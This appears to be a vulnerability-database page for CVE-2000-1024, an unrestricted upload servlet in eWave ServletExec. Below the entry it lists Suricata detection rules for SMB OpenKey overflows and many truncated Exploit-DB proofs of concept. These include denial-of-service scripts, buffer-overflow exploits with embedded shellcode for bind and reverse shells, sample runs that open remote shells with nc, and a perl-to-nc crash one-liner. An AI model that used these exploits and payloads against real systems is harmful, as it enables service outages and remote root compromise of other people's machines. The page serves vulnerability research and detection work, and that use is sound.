CVE-2000-1024
published 2000-12-11CVE-2000-1024: eWave ServletExec 3.0C and earlier does not restrict access to the UploadServlet Java/JSP servlet, which allows remote attackers to upload files and execute…
PriorityP341critical10CVSS 2.0
AVNACLAuNCCICAC
EPSS
5.13%
91.3th percentile
eWave ServletExec 3.0C and earlier does not restrict access to the UploadServlet Java/JSP servlet, which allows remote attackers to upload files and execute arbitrary commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unify | ewave_servletexec | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL NETBIOS SMB OpenKey little endian overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB OpenKey little endian overflow attempt
GPL NETBIOS SMB OpenKey little endian overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103219; rev:4; metadata:created_at 2010_09_23, cve CVE_2000_0377,
Suricata
GPL NETBIOS SMB-DS OpenKey overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB-DS OpenKey overflow attempt
GPL NETBIOS SMB-DS OpenKey overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103226; rev:4; metadata:created_at 2010_09_23, cve CVE_2000_0377, confidence Medium, signature
Suricata
GPL NETBIOS SMB-DS OpenKey little endian overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB-DS OpenKey little endian overflow attempt
GPL NETBIOS SMB-DS OpenKey little endian overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103227; rev:4; metadata:created_at 2010_09_23, cve CVE_2000_
Suricata
GPL NETBIOS SMB OpenKey andx overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB OpenKey andx overflow attempt
GPL NETBIOS SMB OpenKey andx overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; clas
Suricata
GPL NETBIOS SMB OpenKey overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB OpenKey overflow attempt
GPL NETBIOS SMB OpenKey overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; reference:url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx; classtype:attempted-admin; sid:2103218; rev:5; metadata:cre
Suricata
GPL NETBIOS SMB-DS OpenKey andx overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB-DS OpenKey andx overflow attempt
GPL NETBIOS SMB-DS OpenKey andx overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377
Suricata
GPL NETBIOS SMB OpenKey little endian andx overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB OpenKey little endian andx overflow attempt
GPL NETBIOS SMB OpenKey little endian andx overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1
Suricata
GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt
suricata·2010-09-23
CVE-2000-0377 GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt
GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bug
Exploit-DB
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
exploitdb·2019-08-12·CVSS 9.8
CVE-2019-12255 [CRITICAL] VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
---
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)
seq_num = seq_num + 1
ack_num = syn
Exploit-DB
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
exploitdb·2007-07-18
CVE-2007-3764 Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
Asterisk
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB
IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
exploitdb·2007-03-29
CVE-2007-1675 IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
---
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a0
Exploit-DB
Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service
exploitdb·2006-12-25
CVE-2006-6723 Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service
Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service
---
#!/usr/bin/python
# MS Windows Workstation Service NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit
# Bug discovered by h07
# Tested on:..
# - Windows XP SP2 Polish
# - Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# wks_dos.py 192.168.0.2 512
#
# [*] MS Windows NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07
# [*] Connecting to 192.168.0.2:445 (NULL Session)
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# NetrWkstaUserEnum(max_len = 1024 * 1024 * 512)
# Exploit --> NULL Session --> PIPE: browser --> NetrWkstaUserEnum() --> Windows XP
# svchost.exe memory usage: 512 MB
##
Exploit-DB
Star FTP Server 1.10 - 'RETR' Remote Denial of Service
exploitdb·2006-12-17
CVE-2006-6643 Star FTP Server 1.10 - 'RETR' Remote Denial of Service
Star FTP Server 1.10 - 'RETR' Remote Denial of Service
---
# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro http://iHACK.pl
from socket import *
from sys import exit
print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro http://iHACK.pl'
host = '127.0.0.1'
port = 21
username = 'necro'
password = 'dupa'
evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n'
s = socket(AF_INET, SOCK_STREAM)
try:
s.connect((host, port))
except:
print '\n[-] Connection Error'
exit()
s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send('PORT 2000\r\n')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()
print '[+] Done, shutdown.'
# milw0rm.com [2006-12-17]
Exploit-DB
Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service
exploitdb·2006-12-01
CVE-2006-6296 Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service
Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service
---
#!/usr/bin/python
# MS Windows spoolss GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# Bug discovered by h07
# Tested on Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# C:\>python spoolss_dos.py 192.168.0.2 512
#
# [*] MS Windows GetPrinterData() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07
# [*] Connecting to 192.168.0.2:445
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# Exploit --> GetPrinterData(handle, value, 1024 * 1024 * 512) --> MS_Windows
# Spooler service(spoolsv.exe) memory usage: 512 MB
##
from impacket.structure import Structure
from impacket.nmb import NetBIOSTimeout
fro
Exploit-DB
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
exploitdb·2006-09-27
CVE-2006-5112 NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow
---
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32>
*/
#include
#define PORT 80
#define BUFF_SIZE 1024
typedef struct
{
char os_name[32];
unsigned long ret;
} target;
char shellcode[] =
/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.c
Exploit-DB
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
exploitdb·2006-08-21
CVE-2006-4318 Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow
---
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:\>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\wftpd323>
*/
#include
#include
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x
Exploit-DB
Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service
exploitdb·2001-12-10
CVE-2001-1184 Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service
Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service
---
// source: https://www.securityfocus.com/bid/3659/info
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (ie "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.
Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negat
Exploit-DB
Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service
exploitdb·2001-12-10
CVE-2001-1184 Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service
Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service
---
// source: https://www.securityfocus.com/bid/3659/info
Winsock RSHD/NT is a Remote Shell Daemon for Windows NT and Windows 2000. It uses the standard Unix rsh and rcp commands. rsh (ie "remote shell") allows the execution of a non-interactive program on another system running the server component, 'rshd'. The daemon listens for connections coming from an rsh command through TCP/IP, and, on receiving a connection, validates access and executes the specified program.
Upon connecting to the daemon, rsh will supply a port number for the daemon to send standard error data. If the port number specified is invalid, Winsock RSHD/NT will attempt to connect to the invalid port and all port numbers below 1024 (including negat
Exploit-DB
LPRng 3.6.22/23/24 - Remote Command Execution
exploitdb·2000-12-11
CVE-2000-0917 LPRng 3.6.22/23/24 - Remote Command Execution
LPRng 3.6.22/23/24 - Remote Command Execution
---
/*
* LPRng remote root exploit for x86 Linux
* 9/27/00
*
* - sk8
* tested on compiled LPRng 3.6.22/23/24
*
*/
#include
#include
char sc[]=
"\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff"
"\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39"
"\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7"
"\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b"
"\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh";
#define NOP 0x90 //will be split up, doesn't matter
int main(int argc, char** argv) {
char getbuf[1000];
int bpad=0; /* was 2 */ /* 3 for other */
/* 2 - -34
3 - -41
0 - -42
*/
int i=0;
int eiploc=0x41424344;
char buffer[1024];
char fmtbuf[128];
int shloc=-1; //0xbffff2c8;
int hi=100;
int lo=200;
i
Exploit-DB
HP-UX FTPD - Remote Buffer Overflow
exploitdb·2000-12-01
CVE-2000-0699 HP-UX FTPD - Remote Buffer Overflow
HP-UX FTPD - Remote Buffer Overflow
---
/* theoretical exploit for hpux ftpd vulnerability */
/* not tested anywhere, needs tweaking */
/* (c) 2000 by babcia padlina ltd. */
#include
#include
#define NOPS 100
#define BUFSIZE 1024
char shellcode[] = /* HP-UX shellcode */
"\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b"
"\x5a\x02\x9a\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41"
"\x04\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02"
"\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34"
"\xde\xad\xca\xfe\x2f\x62\x69\x6e\x2f\x73\x68";
char nop[] = "\x08\x21\x02\x80"; /* PA-RISC NOP */
unsigned long ret = 0xdeadbeef;
int main(argc, argv)
int argc;
char **argv;
{
int stackofs;
char buf[BUFSIZ*2];
int i;
for (strcpy(buf,
Exploit-DB
Solaris/SPARC 2.7 / 7 locale - Format String
exploitdb·2000-11-20
CVE-2000-0844 Solaris/SPARC 2.7 / 7 locale - Format String
Solaris/SPARC 2.7 / 7 locale - Format String
---
/*
Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7
Based on the exploit by Warning3
For additional information see http://www.phreedom.org/solar/locale_sol.txt
By Solar Eclipse
Assistant Editor,
Phreedom Magazine
http://www.phreedom.org
10 Oct 2000
*/
#include
#include
#define NUM 98 /* default number of words to dump from the stack */
#define ALIGN 3 /* default align (can be 0, 1, 2, 3) */
#define RETLOCOFS -16 /* default offset of the return address location */
#define SHELLOFS -6 /* default offset of the jump location from the beginning of the shell buffer */
#define RETLOC 0xfffffffd
#define PATTERN 1024 /* format string buffer size */
#define SHELL 1024 /* shell buffer size */
#define NOP 0xac15a16e
Exploit-DB
cURL 6.1 < 7.4 - Remote Buffer Overflow (2)
exploitdb·2000-10-13
CVE-2000-0973 cURL 6.1 < 7.4 - Remote Buffer Overflow (2)
cURL 6.1 1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $hostinfo->name || $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
Exploit-DB
cURL 6.1 < 7.4 - Remote Buffer Overflow (1)
exploitdb·2000-10-13
CVE-2000-0973 cURL 6.1 < 7.4 - Remote Buffer Overflow (1)
cURL 6.1 1024 && $id != 0) {
print
Option: $0 -o
Note: low ports require root privileges
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+
TWENTE
exit;
}
for ($i = 0; $i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
while($cl = $sock->accept()) {
$hostinfo = gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]\n", $cl->peerhost;
print $cl "220 Safemode.org FTP server (Version 666) ready.\n";
print $cl "230 Ok\n";
print $cl "227 $buffer\n";
sleep 2;
}
Exploit-DB
Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service
exploitdb·2000-06-08
CVE-2000-0508 Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service
Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/1372/info
A denial of service attack exists in the NFS lock daemon supplied with Linux. By connecting to the port rpc.lockd is running on, and supplying random input, it will cause lockd to exit with an error. The socket associated with rpc.lockd is also not properly released, and cannot be rebound to without a reboot.
This vulnerability most likely affects all Linux distributions running NFS.
[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100021 1 tcp 1024 nlockmgr
100021 3 tcp 1024 nlockmgr
100024 1 udp 831 status
100024 1 tcp 833
Exploit-DB
Stelian Pop dump 0.4 - restore Buffer Overflow
exploitdb·2000-06-07
CVE-2000-0520 Stelian Pop dump 0.4 - restore Buffer Overflow
Stelian Pop dump 0.4 - restore Buffer Overflow
---
// source: https://www.securityfocus.com/bid/1330/info
A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges.
The buffer overflow lies in the tape.c source file:
/dump-0.4b15/compat/include/protocols/dumprestore.h: line 53: #define TP_BSIZE 1024
/dump-0.4b15/restore/tape.c: line 311: char buf[TP_BSIZE];
/dump-0.4b15/restore/tape.c: line 357: (void) fgets(buf, BUFSIZ, terminal)
/dump-0.4b15/restore/tape.c: line 382: (void) fgets(buf, BUFSIZ, terminal);
As BUFSIZ is defined to be 8192, the fgets() will
Exploit-DB
Allegro RomPager 2.10 - URL Request Denial of Service
exploitdb·2000-06-01·CVSS 7.5
CVE-2000-0470 [HIGH] Allegro RomPager 2.10 - URL Request Denial of Service
Allegro RomPager 2.10 - URL Request Denial of Service
---
Allegro's RomPager is reported prone to a remote denial of service vulnerability.
If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser.
CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304
The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works
the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80
$ ping $ip_address # doesn't work
Exploit-DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
exploitdb·2000-04-24
CVE-2000-0317 Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
---
/*
source: https://www.securityfocus.com/bid/1138/info
A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
*/
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
i
Exploit-DB
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
exploitdb·2000-03-23
CVE-2000-0227 Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
---
/*
source: https://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
*/
#include
#include
#include
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
exploitdb·1999-07-13
CVE-1999-0696 Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
Exploit-DB
IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
exploitdb·1998-11-01
CVE-2000-0795 IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
IRIX 6.2/6.3 - '/bin/lpstat' Local Buffer Overflow
---
/*
source: https://www.securityfocus.com/bid/1529/info
Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise.
*/
